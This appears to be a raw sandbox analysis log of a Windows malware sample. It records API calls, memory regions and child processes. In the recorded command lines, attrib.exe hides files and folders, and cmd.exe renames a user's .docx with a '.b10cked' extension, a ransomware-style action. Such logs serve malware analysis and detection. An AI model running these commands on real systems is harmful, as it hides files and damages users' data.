[0133.308] GetFileType (hFile=0x4c) returned 0x1 [0133.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.309] GetFileType (hFile=0x4c) returned 0x1 [0133.309] _get_osfhandle (_FileHandle=1) returned 0x4c [0133.309] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeef8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ae0dc, lpOverlapped=0x0 | out: lpBuffer=0x1aeef8*, lpNumberOfBytesWritten=0x1ae0dc*=0x32, lpOverlapped=0x0) returned 1 [0133.309] _get_osfhandle (_FileHandle=4) returned 0x54 [0133.309] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae0c8 | out: lpNewFilePointer=0x0) returned 1 [0133.309] _close (_FileHandle=4) returned 0 [0133.309] FindNextFileW (in: hFindFile=0x390e90, lpFindFileData=0x1af15c | out: lpFindFileData=0x1af15c) returned 0 [0133.309] GetLastError () returned 0x12 [0133.309] FindClose (in: hFindFile=0x390e90 | out: hFindFile=0x390e90) returned 1 [0133.310] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0133.457] _close (_FileHandle=3) returned 0 [0133.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.458] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0133.458] _get_osfhandle (_FileHandle=1) returned 0x7 [0133.458] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0133.458] _get_osfhandle (_FileHandle=0) returned 0x3 [0133.458] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0133.458] SetConsoleInputExeNameW () returned 0x1 [0133.458] GetConsoleOutputCP () returned 0x1b5 [0133.458] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0133.458] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.458] exit (_Code=0) Process: id = "124" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166a0" os_pid = "0xba4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "121" os_parent_pid = "0xa44" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13006 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13007 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13008 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13009 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 13010 start_va = 0x3c0000 end_va = 0x3c6fff entry_point = 0x3c0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13011 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13012 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13013 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13014 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 13015 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13016 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13017 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13018 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13019 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 13020 start_va = 0x5b0000 end_va = 0x6affff entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 13021 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13022 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13023 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13024 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13025 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13026 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13027 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13028 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13029 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13030 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13031 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13032 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13033 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 13034 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13035 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 181 os_tid = 0xb60 Process: id = "125" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16660" os_pid = "0xb38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "121" os_parent_pid = "0xa44" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13056 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13057 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13058 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13059 start_va = 0xd0000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 13060 start_va = 0x7b0000 end_va = 0x7b6fff entry_point = 0x7b0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13061 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13062 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13063 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13064 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 13065 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13066 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13067 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13068 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13069 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 13070 start_va = 0x2c0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 13071 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13072 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13073 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13074 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13075 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13076 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13077 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13078 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13079 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13080 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13081 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13082 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13083 start_va = 0x110000 end_va = 0x1d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000110000" filename = "" Region: id = 13084 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13085 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 182 os_tid = 0xb34 Process: id = "126" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16660" os_pid = "0xb54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "121" os_parent_pid = "0xa44" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13086 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13087 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13088 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13089 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 13090 start_va = 0xdc0000 end_va = 0xdc6fff entry_point = 0xdc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13091 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13092 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13093 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13094 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 13095 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13096 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13097 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13098 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13099 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 13100 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 13101 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13102 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13103 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13104 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13105 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13106 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13107 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13108 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13109 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13110 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13111 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13112 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13113 start_va = 0x190000 end_va = 0x257fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 13114 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13115 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 183 os_tid = 0xb44 Process: id = "127" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16640" os_pid = "0xc4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\TQ3YPK~1.DOC\" \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\Tq3yPk_6C.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13133 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13134 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13135 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13136 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 13137 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13138 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13139 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13140 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13141 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 13142 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13274 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13275 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13276 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13277 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 13278 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 13279 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13280 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13281 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13282 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13283 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13284 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13285 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13286 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13287 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13288 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 13289 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13290 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13291 start_va = 0xd0000 end_va = 0xd6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 13292 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 13293 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 13294 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 13295 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 13296 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 13297 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 184 os_tid = 0xb70 [0134.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f9a4 | out: lpSystemTimeAsFileTime=0x28f9a4*(dwLowDateTime=0x89f97240, dwHighDateTime=0x1d440a9)) [0134.279] GetCurrentProcessId () returned 0xc4c [0134.279] GetCurrentThreadId () returned 0xb70 [0134.279] GetTickCount () returned 0x2a977 [0134.279] QueryPerformanceCounter (in: lpPerformanceCount=0x28f99c | out: lpPerformanceCount=0x28f99c*=19106844858) returned 1 [0134.280] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 